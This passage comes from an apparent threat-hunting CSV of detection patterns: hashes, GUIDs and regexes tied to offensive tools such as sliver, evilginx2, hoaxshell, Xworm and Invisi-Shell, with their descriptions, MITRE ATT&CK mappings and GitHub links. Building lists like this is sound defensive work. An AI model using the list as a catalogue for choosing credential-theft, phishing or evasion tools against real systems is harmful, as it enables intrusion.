tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c*",".{0,1000}7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108*",".{0,1000}7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a*",".{0,1000}7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*",".{0,1000}7H0LmBxFtXBPd0\/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*",".{0,1000}7L0LgBxFtTDc093TPe\/dntnM7G6Sncm.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*7z2john.pl*",".{0,1000}7z2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*80 253 149 118 169 176 183 169 182 184*",".{0,1000}80\s253\s149\s118\s169\s176\s183\s169\s182\s184.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b*",".{0,1000}8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5*",".{0,1000}80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d*",".{0,1000}805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22*",".{0,1000}806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4*",".{0,1000}80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30*",".{0,1000}80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b*",".{0,1000}80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6*",".{0,1000}80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551*",".{0,1000}810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa*",".{0,1000}811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a*",".{0,1000}815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf*",".{0,1000}815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776*",".{0,1000}81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec*",".{0,1000}81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d*",".{0,1000}81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab*",".{0,1000}81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1*",".{0,1000}8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*82277B35-D159-4B44-8D54-FB66EDD58D5C*",".{0,1000}82277B35\-D159\-4B44\-8D54\-FB66EDD58D5C.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b*",".{0,1000}82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1*",".{0,1000}823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523*",".{0,1000}826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d*",".{0,1000}82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3*",".{0,1000}82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82B0EE92-347E-412F-8EA2-CBDE683EDA57*",".{0,1000}82B0EE92\-347E\-412F\-8EA2\-CBDE683EDA57.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194*",".{0,1000}82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63*",".{0,1000}82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82d331f75a99d1547e0ccc3c3efd0a7a*",".{0,1000}82d331f75a99d1547e0ccc3c3efd0a7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153*",".{0,1000}82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82F417BE-49BF-44FF-9BBD-64FECEA181D7*",".{0,1000}82F417BE\-49BF\-44FF\-9BBD\-64FECEA181D7.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*83035080-7788-4EA3-82EE-6C06D2E6891F*",".{0,1000}83035080\-7788\-4EA3\-82EE\-6C06D2E6891F.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*",".{0,1000}8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf*",".{0,1000}833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a*",".{0,1000}83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c*",".{0,1000}84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b*",".{0,1000}8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289*",".{0,1000}84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*",".{0,1000}847D29FF\-8BBC\-4068\-8BE1\-D84B1089B3C0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*8489A9CE-AB1A-4D8D-8824-D9E18B9945FE*",".{0,1000}8489A9CE\-AB1A\-4D8D\-8824\-D9E18B9945FE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator 